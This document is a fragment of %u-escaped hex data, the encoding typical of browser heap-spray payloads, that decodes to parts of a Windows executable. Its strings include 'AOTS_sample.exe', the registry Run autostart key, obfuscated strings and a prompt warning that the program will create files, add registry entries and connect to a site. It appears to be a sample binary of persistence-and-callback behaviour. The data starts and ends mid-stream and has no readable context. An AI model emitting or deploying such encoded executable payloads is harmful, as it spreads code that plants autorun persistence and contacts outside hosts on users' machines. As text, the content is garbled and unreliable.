59%u2046%u053b%uaac8%u0040%u0774%ue850%ufc41%uffff%u8b59%u2476%u353b%uaacc%u0040%u0774%ue856%ufc2f%uffff%u5e59%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uc983%u8dff%u0049%uc183%u8a01%u0a06%u74c0%u8309%u01c6%ua30f%u2404%uee73%uc18b%uc483%u5e20%uc3c9%uff8b%u8b55%u8bec%u084d%u3353%u56db%u3b57%u74cb%u8b07%u0c7d%ufb3b%u1b77%uc5e8%uffd1%u6aff%u5e16%u3089%u5353%u5353%ue853%ud14e%uffff%uc483%u8b14%uebc6%u8b30%u1075%uf33b%u0475%u1988%udaeb%ud18b%u068a%u0288%u4642%uc33a%u0374%u754f%u3bf3%u75fb%u8810%ue819%ud18a%uffff%u226a%u8959%u8b08%uebf1%u33c1%u5fc0%u5b5e%uc35d%ucccc%u8b55%u57ec%u8b56%u0c75%u4d8b%u8b10%u087d%uc18b%ud18b%uc603%ufe3b%u0876%uf83b%u820f%u01a4%u0000%uf981%u0100%u0000%u1f72%u3d83%ub6b0%u0040%u7400%u5716%u8356%u0fe7%ue683%u3b0f%u5efe%u755f%u5e08%u5d5f%uede9%u0021%uf700%u03c7%u0000%u7500%uc115%u02e9%ue283%u8303%u08f9%u2a72%ua5f3%u24ff%u0495%u4052%u9000%uc78b%u03ba%u0000%u8300%u04e9%u0c72%ue083%u0303%uffc8%u8524%u5118%u0040%u24ff%u148d%u4052%u9000%u24ff%u988d%u4051%u9000%u5128%u0040%u5154%u0040%u5178%u0040%ud123%u068a%u0788%u468a%u8801%u0147%u468a%uc102%u02e9%u4788%u8302%u03c6%uc783%u8303%u08f9%ucc72%ua5f3%u24ff%u0495%u4052%u8d00%u0049%ud123%u068a%u0788%u468a%uc101%u02e9%u4788%u8301%u02c6%uc783%u8302%u08f9%ua672%ua5f3%u24ff%u0495%u4052%u9000%ud123%u068a%u0788%uc683%uc101%u02e9%uc783%u8301%u08f9%u8872%ua5f3%u24ff%u0495%u4052%u8d00%u0049%u51fb%u0040%u51e8%u0040%u51e0%u0040%u51d8%u0040%u51d0%u0040%u51c8%u0040%u51c0%u0040%u51b8%u0040%u448b%ue48e%u4489%ue48f%u448b%ue88e%u4489%ue88f%u448b%uec8e%u4489%uec8f%u448b%uf08e%u4489%uf08f%u448b%uf48e%u4489%uf48f%u448b%uf88e%u4489%uf88f%u448b%ufc8e%u4489%ufc8f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u5204%u0040%uff8b%u5214%u0040%u521c%u0040%u5228%u0040%u523c%u0040%u458b%u5e08%uc95f%u90c3%u068a%u0788%u458b%u5e08%uc95f%u90c3%u068a%u0788%u468a%u8801%u0147%u458b%u5e08%uc95f%u8dc3%u0049%u068a%u0788%u468a%u8801%u0147%u468a
%u8802%u0247%u458b%u5e08%uc95f%u90c3%u748d%ufc31%u7c8d%ufc39%uc7f7%u0003%u0000%u2475%ue9c1%u8302%u03e2%uf983%u7208%ufd0d%ua5f3%ufffc%u9524%u53a0%u0040%uff8b%ud9f7%u24ff%u508d%u4053%u8d00%u0049%uc78b%u03ba%u0000%u8300%u04f9%u0c72%ue083%u2b03%uffc8%u8524%u52a4%u0040%u24ff%ua08d%u4053%u9000%u52b4%u0040%u52d8%u0040%u5300%u0040%u468a%u2303%u88d1%u0347%uee83%uc101%u02e9%uef83%u8301%u08f9%ub272%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u468a%u2303%u88d1%u0347%u468a%uc102%u02e9%u4788%u8302%u02ee%uef83%u8302%u08f9%u8872%uf3fd%ufca5%u24ff%ua095%u4053%u9000%u468a%u2303%u88d1%u0347%u468a%u8802%u0247%u468a%uc101%u02e9%u4788%u8301%u03ee%uef83%u8303%u08f9%u820f%uff56%uffff%uf3fd%ufca5%u24ff%ua095%u4053%u8d00%u0049%u5354%u0040%u535c%u0040%u5364%u0040%u536c%u0040%u5374%u0040%u537c%u0040%u5384%u0040%u5397%u0040%u448b%u1c8e%u4489%u1c8f%u448b%u188e%u4489%u188f%u448b%u148e%u4489%u148f%u448b%u108e%u4489%u108f%u448b%u0c8e%u4489%u0c8f%u448b%u088e%u4489%u088f%u448b%u048e%u4489%u048f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u53a0%u0040%uff8b%u53b0%u0040%u53b8%u0040%u53c8%u0040%u53dc%u0040%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u458b%u5e08%uc95f%u8dc3%u0049%u468a%u8803%u0347%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u468a%u8802%u0247%u468a%u8801%u0147%u458b%u5e08%uc95f%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%u4c8b%u0424%uc1f7%u0003%u0000%u2474%u018a%uc183%u8401%u74c0%uf74e%u03c1%u0000%u7500%u05ef%u0000%u0000%ua48d%u0024%u0000%u8d00%u24a4%u0000%u0000%u018b%uffba%ufefe%u037e%u83d0%ufff0%uc233%uc183%ua904%u0100%u8101%ue874%u418b%u84fc%u74c0%u8432%u74e4%ua924%u0000%u00ff%u1374%u00a9%u0000%u74ff%ueb02%u8dcd%uff41%u4c8b%u0424%uc12b%u8dc3%ufe41%u4c8b%u0424%uc12b%u8dc3%ufd41%u4c8b%u0424%uc12b%u8dc3%ufc41%u4c8b%u0424%uc12b%uccc3%ucccc%ucccc%u8b55%u56ec%uc033%u5050%u5050%u5050%u5050%u558b%u8d0c%u0049%u028a%uc00a%u0974%uc283%u0f01%u04ab%ueb24%u8bf1%u0875%uff8b%u068a%uc00a%u0c74%uc683%u0f01%u04a3%u7324%u8df1%uff46%uc483%u5e20%uc3c9%u086a%ub068%u4096%ue800%uec54%uffff%udce8%uffda%u8bff%u
7840%uc085%u1674%u6583%u00fc%ud0ff%u07eb%uc033%uc340%u658b%uc7e8%ufc45%ufffe%uffff%ubae8%u001e%ue800%uec6d%uffff%u68c3%u54d0%u0040%ue3e8%uffd7%u59ff%u80a3%u40b2%uc300%uff8b%u8b55%u51ec%u5653%uff57%ue835%u40b7%ue800%ud843%uffff%u35ff%ub7e4%u0040%uf88b%u7d89%ue8fc%ud833%uffff%uf08b%u5959%uf73b%u820f%u0083%u0000%ude8b%udf2b%u438d%u8304%u04f8%u7772%ue857%u1f78%u0000%uf88b%u438d%u5904%uf83b%u4873%u00b8%u0008%u3b00%u73f8%u8b02%u03c7%u3bc7%u72c7%u500f%u75ff%ue8fc%uf79e%uffff%u5959%uc085%u1675%u478d%u3b10%u72c7%u5040%u75ff%ue8fc%uf788%uffff%u5959%uc085%u3174%ufbc1%u5002%u348d%ue898%ud74e%uffff%ua359%ub7e8%u0040%u75ff%ue808%ud740%uffff%u0689%uc683%u5604%u35e8%uffd7%u59ff%ue4a3%u40b7%u8b00%u0845%ueb59%u3302%u5fc0%u5b5e%uc3c9%uff8b%u6a56%u6a04%ue820%uf6f2%uffff%uf08b%ue856%ud70e%uffff%uc483%ua30c%ub7e8%u0040%ue4a3%u40b7%u8500%u75f6%u6a05%u5818%uc35e%u2683%u3300%u5ec0%u6ac3%u680c%u96d0%u0040%u1fe8%uffeb%ue8ff%uddfe%uffff%u6583%u00fc%u75ff%ue808%ufef8%uffff%u8959%ue445%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%ueb3b%uffff%ue8c3%udddd%uffff%u8bc3%u55ff%uec8b%u75ff%ue808%uffb7%uffff%ud8f7%uc01b%ud8f7%u4859%uc35d%uff8b%u5756%uff33%ub78d%uaaf0%u0040%u36ff%u8be8%uffd6%u83ff%u04c7%u8959%u8306%u28ff%ue872%u5e5f%uccc3%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u084d%u4db8%u005a%u6600%u0139%u0474%uc033%uc35d%u418b%u033c%u81c1%u5038%u0045%u7500%u33ef%ub9d2%u010b%u0000%u3966%u1848%u940f%u8bc2%u5dc2%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u8bec%u0845%u488b%u033c%u0fc8%u41b7%u5314%u0f56%u71b7%u3306%u57d2%u448d%u1808%uf685%u1b76%u7d8b%u8b0c%u0c48%uf93b%u0972%u588b%u0308%u3bd9%u72fb%u420a%uc083%u3b28%u72d6%u33e8%u5fc0%u5b5e%uc35d%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%uff8b%u8b55%u6aec%u68fe%u96f0%u0040%u9068%u4041%u6400%u00a1%u0000%u5000%uec83%u5308%u5756%ub4a1%u40a8%u3100%uf845%uc533%u8d50%uf045%ua364%u0000%u0000%u6589%uc7e8%ufc45%u0000%u0000%u0068%u4000%ue800%uff2a%uffff%uc483%u8504%u74c0%u8b55%u0845%u002d%u4000%u5000%u0068%u4000%ue800%uff50%uffff%uc483%u8508%u74c0%u8b3b%u2440%ue8c1%uf7
1f%u83d0%u01e0%u45c7%ufefc%uffff%u8bff%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%uec45%u088b%u018b%ud233%u053d%u0000%u0fc0%uc294%uc28b%u8bc3%ue865%u45c7%ufefc%uffff%u33ff%u8bc0%uf04d%u8964%u000d%u0000%u5900%u5e5f%u8b5b%u5de5%u8bc3%u55ff%uec8b%u458b%ua308%ub284%u0040%u88a3%u40b2%ua300%ub28c%u0040%u90a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%u8b08%u6c0d%u40a8%u5600%u5039%u7404%u8b0f%u6bf1%u0cf6%u7503%u8308%u0cc0%uc63b%uec72%uc96b%u030c%u084d%u3b5e%u73c1%u3905%u0450%u0274%uc033%uc35d%u35ff%ub28c%u0040%u44e8%uffd5%u59ff%u6ac3%u6820%u9710%u0040%uf5e8%uffe8%u33ff%u89ff%ue47d%u7d89%u8bd8%u085d%ufb83%u7f0b%u744c%u8b15%u6ac3%u5902%uc12b%u2274%uc12b%u0874%uc12b%u6474%uc12b%u4475%udde8%uffd6%u8bff%u89f8%ud87d%uff85%u1475%uc883%ue9ff%u0161%u0000%u84be%u40b2%ua100%ub284%u0040%u60eb%u77ff%u8b5c%ue8d3%uff5d%uffff%uf08b%uc683%u8b08%ueb06%u8b5a%u83c3%u0fe8%u3c74%ue883%u7406%u482b%u1c74%u5de8%uffc9%uc7ff%u1600%u0000%u3300%u50c0%u5050%u5050%ue3e8%uffc8%u83ff%u14c4%uaeeb%u8cbe%u40b2%ua100%ub28c%u0040%u16eb%u88be%u40b2%ua100%ub288%u0040%u0aeb%u90be%u40b2%ua100%ub290%u0040%u45c7%u01e4%u0000%u5000%u80e8%uffd4%u89ff%ue045%u3359%u83c0%ue07d%u0f01%ud884%u0000%u3900%ue045%u0775%u036a%u21e8%uffdd%u39ff%ue445%u0774%ue850%uf2b4%uffff%u3359%u89c0%ufc45%ufb83%u7408%u830a%u0bfb%u0574%ufb83%u7504%u8b1b%u604f%u4d89%u89d4%u6047%ufb83%u7508%u8b40%u644f%u4d89%uc7d0%u6447%u008c%u0000%ufb83%u7508%u8b2e%u600d%u40a8%u8900%udc4d%u0d8b%ua864%u0040%u158b%ua860%u0040%uca03%u4d39%u7ddc%u8b19%udc4d%uc96b%u8b0c%u5c57%u4489%u0811%u45ff%uebdc%ue8db%ud3e8%uffff%u0689%u45c7%ufefc%uffff%ue8ff%u0015%u0000%ufb83%u7508%uff1f%u6477%uff53%ue055%ueb59%u8b19%u085d%u7d8b%u83d8%ue47d%u7400%u6a08%ue800%uf142%uffff%uc359%uff53%ue055%u8359%u08fb%u0a74%ufb83%u740b%u8305%u04fb%u1175%u458b%u89d4%u6047%ufb83%u7508%u8b06%ud045%u4789%u3364%ue8c0%ue797%uffff%u8bc3%u55ff%uec8b%u458b%ua308%ub298%u0040%uc35d%uff8b%u8b55%u8bec%u0845%ua4a3%u40b2%u5d00%u8bc3%u55ff%uec8b%u458b%ua308%ub2a8%u0040%uc35d%u106a%u3068%u4097%ue800%ue718%uffff
%u6583%u00fc%u75ff%uff0c%u0875%u15ff%u8064%u0040%u4589%uebe4%u8b2f%uec45%u008b%u008b%u4589%u33e0%u3dc9%u0017%uc000%u940f%u8bc1%uc3c1%u658b%u81e8%ue07d%u0017%uc000%u0875%u086a%u15ff%u80a8%u0040%u6583%u00e4%u45c7%ufefc%uffff%u8bff%ue445%u0ae8%uffe7%uc3ff%uff8b%u8b55%u8bec%u0845%uaca3%u40b2%u5d00%u8bc3%u55ff%uec8b%u35ff%ub2ac%u0040%ue6e8%uffd2%u59ff%uc085%u0f74%u75ff%uff08%u59d0%uc085%u0574%uc033%u5d40%u33c3%u5dc0%u8bc3%u55ff%uec8b%uec83%u5314%u5756%ub5e8%uffd2%u83ff%ufc65%u8300%ub03d%u40b2%u0000%ud88b%u850f%u008e%u0000%u7068%u4092%uff00%u2015%u4080%u8b00%u85f8%u0fff%u2a84%u0001%u8b00%u1c35%u4080%u6800%u9264%u0040%uff57%u85d6%u0fc0%u1484%u0001%u5000%uffe8%uffd1%uc7ff%u2404%u9254%u0040%ua357%ub2b0%u0040%ud6ff%ue850%ud1ea%uffff%u04c7%u4024%u4092%u5700%ub4a3%u40b2%uff00%u50d6%ud5e8%uffd1%uc7ff%u2404%u9224%u0040%ua357%ub2b8%u0040%ud6ff%ue850%ud1c0%uffff%ua359%ub2c0%u0040%uc085%u1474%u0c68%u4092%u5700%ud6ff%ue850%ud1a8%uffff%ua359%ub2bc%u0040%ubca1%u40b2%u3b00%u74c3%u394f%uc01d%u40b2%u7400%u5047%u06e8%uffd2%uffff%uc035%u40b2%u8b00%ue8f0%ud1f9%uffff%u5959%uf88b%uf685%u2c74%uff85%u2874%ud6ff%uc085%u1974%u4d8d%u51f8%u0c6a%u4d8d%u51ec%u016a%uff50%u85d7%u74c0%uf606%uf445%u7501%u8109%u104d%u0000%u0020%u39eb%ub4a1%u40b2%u3b00%u74c3%u5030%ub6e8%uffd1%u59ff%uc085%u2574%ud0ff%u4589%u85fc%u74c0%ua11c%ub2b8%u0040%uc33b%u1374%ue850%ud199%uffff%u8559%u74c0%uff08%ufc75%ud0ff%u4589%ufffc%ub035%u40b2%ue800%ud181%uffff%u8559%u74c0%uff10%u1075%u75ff%uff0c%u0875%u75ff%ufffc%uebd0%u3302%u5fc0%u5b5e%uc3c9%uff8b%u8b55%u8bec%u084d%u3356%u3bf6%u7cce%u831e%u02f9%u0c7e%uf983%u7503%ua114%uac68%u0040%u28eb%u68a1%u40ac%u8900%u680d%u40ac%ueb00%ue81b%uc5ca%uffff%u5656%u5656%uc756%u1600%u0000%ue800%uc552%uffff%uc483%u8314%uffc8%u5d5e%u8bc3%u55ff%uec8b%uec83%uff10%u0875%u4d8d%ue8f0%uc0b5%uffff%ub60f%u0c45%u4d8b%u8af4%u1455%u5484%u1d01%u1e75%u7d83%u0010%u1274%u4d8b%u8bf0%uc889%u0000%u0f00%u04b7%u2341%u1045%u02eb%uc033%uc085%u0374%uc033%u8040%ufc7d%u7400%u8b07%uf84d%u6183%ufd70%uc3c9%uff8b%u8b55%u6aec%u6a04%u
ff00%u0875%u006a%u9ae8%uffff%u83ff%u10c4%uc35d%uff8b%u8b55%u8bec%ub40d%u40b6%ua100%ub6b8%u0040%uc96b%u0314%uebc8%u8b11%u0855%u502b%u810c%u00fa%u1000%u7200%u8309%u14c0%uc13b%ueb72%uc033%uc35d%uff8b%u8b55%u83ec%u10ec%u4d8b%u8b08%u1041%u8b56%u0c75%u8b57%u2bfe%u0c79%uc683%uc1fc%u0fef%ucf8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf04d%u0e8b%u8949%ufc4d%uc1f6%u0f01%ud385%u0002%u5300%u1c8d%u8b31%u8913%uf455%u568b%u89fc%uf855%u558b%u89f4%u0c5d%uc2f6%u7501%uc174%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%u044b%u4b3b%u7508%ubb42%u0000%u8000%ufa83%u7320%u8b19%ud3ca%u8deb%u024c%uf704%u21d3%ub85c%ufe44%u7509%u8b23%u084d%u1921%u1ceb%u4a8d%ud3e0%u8deb%u024c%uf704%u21d3%ub89c%u00c4%u0000%u09fe%u0675%u4d8b%u2108%u0459%u5d8b%u8b0c%u0853%u5b8b%u8b04%ufc4d%u4d03%u89f4%u045a%u558b%u8b0c%u045a%u528b%u8908%u0853%u4d89%u8bfc%uc1d1%u04fa%u834a%u3ffa%u0376%u3f6a%u8b5a%uf85d%ue383%u8901%uf45d%u850f%u008f%u0000%u752b%u8bf8%uf85d%ufbc1%u6a04%u893f%u0c75%u5e4b%ude3b%u0276%ude8b%u4d03%u8bf8%uc1d1%u04fa%u894a%ufc4d%ud63b%u0276%ud68b%uda3b%u5e74%u4d8b%u8b0c%u0471%u713b%u7508%ube3b%u0000%u8000%ufb83%u7320%u8b17%ud3cb%uf7ee%u21d6%ub874%ufe44%u034c%u7504%u8b21%u084d%u3121%u1aeb%u4b8d%ud3e0%uf7ee%u21d6%ub8b4%u00c4%u0000%u4cfe%u0403%u0675%u4d8b%u2108%u0471%u4d8b%u8b0c%u0871%u498b%u8904%u044e%u4d8b%u8b0c%u0471%u498b%u8908%u084e%u758b%ueb0c%u8b03%u085d%u7d83%u00f4%u0875%uda3b%u840f%u0080%u0000%u4d8b%u8df0%ud10c%u598b%u8904%u084e%u5e89%u8904%u0471%u4e8b%u8904%u0871%u4e8b%u3b04%u084e%u6075%u4c8a%u0402%u4d88%ufe0f%u88c1%u024c%u8304%u20fa%u2573%u7d80%u000f%u0e75%uca8b%u00bb%u0000%ud380%u8beb%u084d%u1909%u00bb%u0000%u8b80%ud3ca%u8deb%ub844%u0944%ueb18%u8029%u0f7d%u7500%u8d10%ue04a%u00bb%u0000%ud380%u8beb%u084d%u5909%u8d04%ue04a%u00ba%u0000%ud380%u8dea%ub884%u00c4%u0000%u1009%u458b%u89fc%u8906%u3044%u8bfc%uf045%u08ff%u850f%u00f3%u0000%uc4a1%u40b2%u8500%u0fc0%ud884%u0000%u8b00%uc80d%u40b6%u8b00%ue035%u4080%u6800%u4000%u0000%ue1c1%u030f%u0c48%u00bb%u0080%u5300%uff51%u8bd6%uc80d%u40b6%ua100%ub2c4%u0040%u00ba%u0000%ud3
80%u09ea%u0850%uc4a1%u40b2%u8b00%u1040%u0d8b%ub6c8%u0040%ua483%uc488%u0000%u0000%uc4a1%u40b2%u8b00%u1040%u48fe%ua143%ub2c4%u0040%u488b%u8010%u4379%u7500%u8309%u0460%ua1fe%ub2c4%u0040%u7883%uff08%u6575%u6a53%uff00%u0c70%ud6ff%uc4a1%u40b2%uff00%u1070%u006a%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u0d8b%ub6b4%u0040%uc4a1%u40b2%u6b00%u14c9%u158b%ub6b8%u0040%uc82b%u4c8d%uec11%u8d51%u1448%u5051%uade8%u0015%u8b00%u0845%uc483%uff0c%ub40d%u40b6%u3b00%uc405%u40b2%u7600%u8304%u086d%ua114%ub6b8%u0040%uc0a3%u40b6%u8b00%u0845%uc4a3%u40b2%u8900%uc83d%u40b6%u5b00%u5e5f%uc3c9%uc4a1%u40b6%u5600%u358b%ub6b4%u0040%u3357%u3bff%u75f0%u8334%u10c0%uc06b%u5014%u35ff%ub6b8%u0040%uff57%u1c35%u40b1%uff00%u5815%u4080%u3b00%u75c7%u3304%uebc0%u8378%uc405%u40b6%u1000%u358b%ub6b4%u0040%ub8a3%u40b6%u6b00%u14f6%u3503%ub6b8%u0040%uc468%u0041%u6a00%uff08%u1c35%u40b1%uff00%u6015%u4080%u8900%u1046%uc73b%uc774%u046a%u0068%u0020%u6800%u0000%u0010%uff57%u5c15%u4080%u8900%u0c46%uc73b%u1275%u76ff%u5710%u35ff%ub11c%u0040%u15ff%u80e4%u0040%u9beb%u4e83%uff08%u3e89%u7e89%uff04%ub405%u40b6%u8b00%u1046%u0883%u8bff%u5fc6%uc35e%uff8b%u8b55%u51ec%u8b51%u084d%u418b%u5308%u8b56%u1071%u3357%uebdb%u0303%u43c0%uc085%uf97d%uc38b%uc069%u0204%u0000%u848d%u4430%u0001%u6a00%u893f%uf845%u895a%u0840%u4089%u8304%u08c0%u754a%u6af4%u8b04%u68fb%u1000%u0000%ue7c1%u030f%u0c79%u0068%u0080%u5700%u15ff%u805c%u0040%uc085%u0875%uc883%ue9ff%u009d%u0000%u978d%u7000%u0000%u5589%u3bfc%u77fa%u8b43%u2bca%uc1cf%u0ce9%u478d%u4110%u4883%ufff8%u8883%u0fec%u0000%u8dff%ufc90%u000f%u8900%u8d10%ufc90%uffef%uc7ff%ufc40%u0ff0%u0000%u5089%uc704%ue880%u000f%uf000%u000f%u0500%u1000%u0000%u7549%u8bcb%ufc55%u458b%u05f8%u01f8%u0000%u4f8d%u890c%u0448%u4189%u8d08%u0c4a%u4889%u8908%u0441%u6483%u449e%u3300%u47ff%ubc89%uc49e%u0000%u8a00%u4346%uc88a%uc1fe%uc084%u458b%u8808%u434e%u0375%u7809%uba04%u0000%u8000%ucb8b%uead3%ud2f7%u5021%u8b08%u5fc3%u5b5e%uc3c9%uff8b%u8b55%u83ec%u0cec%u4d8b%u8b08%u1041%u5653%u758b%u5710%u7d8b%u8b0c%u2bd7%u0c51%uc683%uc117%u0fea%uca8b%uc969%u0204
%ue9e8%uebea%uedec%uefee%uf1f0%uf3f2%uf5f4%uf7f6%uf9f8%ufbfa%ufdfc%ufffe%u4848%u6d3a%u3a6d%u7373%u0000%u0000%u6464%u6464%u202c%u4d4d%u4d4d%u6420%u2c64%u7920%u7979%u0079%u4d4d%u642f%u2f64%u7979%u0000%u0000%u4d50%u0000%u4d41%u0000%u6544%u6563%u626d%u7265%u0000%u0000%u6f4e%u6576%u626d%u7265%u0000%u0000%u634f%u6f74%u6562%u0072%u6553%u7470%u6d65%u6562%u0072%u0000%u7541%u7567%u7473%u0000%u754a%u796c%u0000%u0000%u754a%u656e%u0000%u0000%u7041%u6972%u006c%u0000%u614d%u6372%u0068%u0000%u6546%u7262%u6175%u7972%u0000%u0000%u614a%u756e%u7261%u0079%u6544%u0063%u6f4e%u0076%u634f%u0074%u6553%u0070%u7541%u0067%u754a%u006c%u754a%u006e%u614d%u0079%u7041%u0072%u614d%u0072%u6546%u0062%u614a%u006e%u6153%u7574%u6472%u7961%u0000%u0000%u7246%u6469%u7961%u0000%u6854%u7275%u6473%u7961%u0000%u0000%u6557%u6e64%u7365%u6164%u0079%u0000%u7554%u7365%u6164%u0079%u6f4d%u646e%u7961%u0000%u7553%u646e%u7961%u0000%u6153%u0074%u7246%u0069%u6854%u0075%u6557%u0064%u7554%u0065%u6f4d%u006e%u7553%u006e%u6547%u5074%u6f72%u6563%u7373%u6957%u646e%u776f%u7453%u7461%u6f69%u006e%u6547%u5574%u6573%u4f72%u6a62%u6365%u4974%u666e%u726f%u616d%u6974%u6e6f%u0041%u0000%u6547%u4c74%u7361%u4174%u7463%u7669%u5065%u706f%u7075%u0000%u6547%u4174%u7463%u7669%u5765%u6e69%u6f64%u0077%u654d%u7373%u6761%u4265%u786f%u0041%u5355%u5245%u3233%u442e%u4c4c%u0000%ub2c8%u0040%ub320%u0040%u7553%u4d6e%u6e6f%u7554%u5765%u6465%u6854%u4675%u6972%u6153%u0074%u0000%u614a%u466e%u6265%u614d%u4172%u7270%u614d%u4a79%u6e75%u754a%u416c%u6775%u6553%u4f70%u7463%u6f4e%u4476%u6365%u0000%u0000%u0000%u0000%u4f41%u5354%u0000%u0000%u005c%u0000%u4f41%u5354%u735f%u6d61%u6c70%u2e65%u7865%u0065%u7375%u7265%u3233%u642e%u6c6c%u0000%u654d%u7373%u6761%u4265%u786f%u0041%u4f41%u5354%u0000%u0000%u0000%u0000%u6854%u7369%u7020%u6f72%u7267%u6d61%u7420%u7972%u7420%u206f%u6f6d%u6964%u7966%u6320%u7275%u6572%u746e%u7320%u7465%u6974%u676e%u2073%u6e69%u7920%u756f%u2072%u6f63%u706d%u7475%u7265%u6528%u672e%u202e%u7263%u6165%u6574%u6620%u6c69%u7365%u6120%u646e%u6f2f%u2072%u6461%u2064%u
6572%u6967%u7473%u7972%u6520%u746e%u7972%u6120%u646e%u7320%u206f%u6e6f%u292e%u6120%u646e%u6320%u6e6f%u656e%u7463%u7420%u206f%u6874%u2065%u6973%u6574%u0a2e%u200a%u6f44%u7920%u756f%u7220%u6165%u6c6c%u2079%u6177%u746e%u7420%u206f%u7865%u6365%u7475%u2065%u6874%u7369%u7020%u6f72%u7267%u6d61%u6e20%u776f%u003f%u4f53%u5446%u4157%u4552%u4d5c%u6369%u6f72%u6f73%u7466%u575c%u6e69%u6f64%u7377%u435c%u7275%u6572%u746e%u6556%u7372%u6f69%u5c6e%u7552%u006e%u0000%u4f41%u5354%u0000%u0000%ud1d1%u88d1%ud6cc%uc3c5%ud2d4%uc988%u88d4%ud6cc%u0000%u0000%ue3e1%u86f2%u8689%uf2ee%uf6f2%u9789%u9688%uacab%uacab%u0000%uc9e5%uedcb%udfc3%u869c%u0000%u0000%u3a4f%u0020%u5245%u4f52%u0052%u0000%u6957%u586e%u0050%u0000%u6957%u326e%u336b%u0000%u6e55%u6e6b%u776f%u006e%u6957%u566e%u7369%u6174%u0000%u0000%u6957%u376e%u0000%u0000%u6e55%u6e6b%u776f%u006e%u654c%u6167%u7963%u0000%u3a4e%u0020%u3a44%u0020%u474e%u0000%u4f53%u5446%u4157%u4552%u4d5c%u6369%u6f72%u6f73%u7466%u575c%u6e69%u6f64%u7377%u435c%u7275%u6572%u746e%u6556%u7372%u6f69%u5c6e%u7552%u006e%u0000%u474e%u0000%u4f41%u5354%u0000%u0000%u474e%u0000%u474e%u0000%u474e%u0000%u4b4f%u0000%ue3e1%u86f2%u8689%uf2ee%uf6f2%u9789%u9688%uacab%u0000%u0000%u0a0d%u0a0d%u0000%u0000%u0048%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua8b4%u0040%u9540%u0040%u0003%u0000%u0000%u0000%u0000%u0000%u4190%u0000%u6818%u0000%u7908%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufffe%uffff%u0000%u0000%uffcc%uffff%u0000%u0000%ufffe%uffff%u2021%u0040%u2035%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u25ac%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffcc%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u297a%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u2cea%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u2f2c%u0040%uff
fe%uffff%u0000%u0000%u2f3b%u0040%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u30ee%u0040%ufffe%uffff%u0000%u0000%u30fa%u0040%ufffe%uffff%u0000%u0000%uffc8%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u3600%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uff8c%uffff%u0000%u0000%ufffe%uffff%u409c%u0040%u40a0%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u4bc3%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u4c55%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u54f0%u0040%u54f4%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u563b%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd8%uffff%u0000%u0000%ufffe%uffff%u579b%u0040%u57af%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffc0%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u599d%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000%ufffe%uffff%u5a2d%u0040%u5a44%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u6ae4%u0040%u6b00%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u6dc9%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd4%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u6fc3%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u7128%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u7566%u0040%u9850%u0000%u0000%u0000%u0000%u0000%u9a7e%u0000%u8014%u0000%u983c%u0000%u0000%u0000%u0000%u0000%u9ace%u0000%u8000%u0000%u9958%u0000%u0000%u0000%u0000%u0000%u9adc%u0000%u811c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u9aae%u0000%u9a9e%u0000%u9a8c%u0000%u9ac0%u0000%u0000%u0000%u99d2%u0000%u99e4%u0000%u99f4%u0000%u9a06%u0000%u9a16%u0000%u99c4%u0000%u9a3c%u0000%u9a50%u0000%u9a60%u0000%u9a70%u0000%u99bc%